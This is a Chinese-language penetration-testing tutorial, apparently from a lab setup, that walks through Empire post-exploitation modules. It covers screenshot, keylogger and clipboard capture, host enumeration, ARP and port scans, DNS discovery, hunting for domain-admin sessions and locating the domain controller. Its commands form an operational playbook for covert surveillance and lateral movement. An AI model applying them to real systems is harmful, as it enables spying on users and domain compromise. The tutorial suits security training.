概述
Empire主要用于后渗透,信息收集往往是比较重要的一个模块,可以使用search module
命令搜索使用的模块,这里通过usemodule collection
然后Tab键查看到整个列表
屏幕截图
usemodule collection/screenshot
info
execute
我们到相应的路径即可查看到截图
键盘记录
usemodule collection/keylogger
info
execute
如果对方的计算机在编写文档,那么我们就能看到相应的信息,注意这里不能将主机名字重命名,因为这样会报错说没有相应的目录
剪贴板记录
这个模块允许用户抓取存储在目标主机Windows剪贴板上的任何内容,可以设置模块参数的抓取限制和间隔时间。
usemodule collection/clipboard_monitor
info
execute
首先我们在目标主机上随便复制粘贴一句话,我们就能在Empire端看到相应的输出内容了
查找共享
usemodule situational_awareness/network/powerview/share_finder
execute
back
收集目标主机的信息
我们输入usemodule situational_awareness/host/winenum
可以查看本机用户、域组成员、最后的密码设置时间、剪贴板内容、系统基本信息、网络适配器信息、共享信息等
usemodule situational_awareness/host/winenum
execute
info
ARP扫描
usemodule situational_awareness/network/arpscan
set Range 192.168.101.0-192.168.101.254
execute
我们还可以对其进行端口扫描
usemodule situational_awareness/network/portscan
execute
DNS信息获取
在内网中,知道所有机器的HostName和对应的IP地址对分析内网结构至关重要
usemodule situational_awareness/network/reverse_dns
或者
usemodule situational_awareness/host/dnsserver
info
execute
查找域管登录服务器IP
在内网渗透中,要想拿到内网中某台机器的域管权限,方法一是找到域管登录的机器,然后横向渗透进去,窃取域管权限,从而拿下整个域。
usemodule situational_awareness/network/powerview/user_hunter
execute
本地管理组访问模块
usemodule situational_awareness/network/powerview/find_localadmin_access
execute
获取域控制器
usemodule situational_awareness/network/powerview/get_domain_controller
execute
可以看到当前域管理器名为OWA2013.rootkit.org,我们尝试能否访问域服务器OWA2013.rootkit.org的"C$"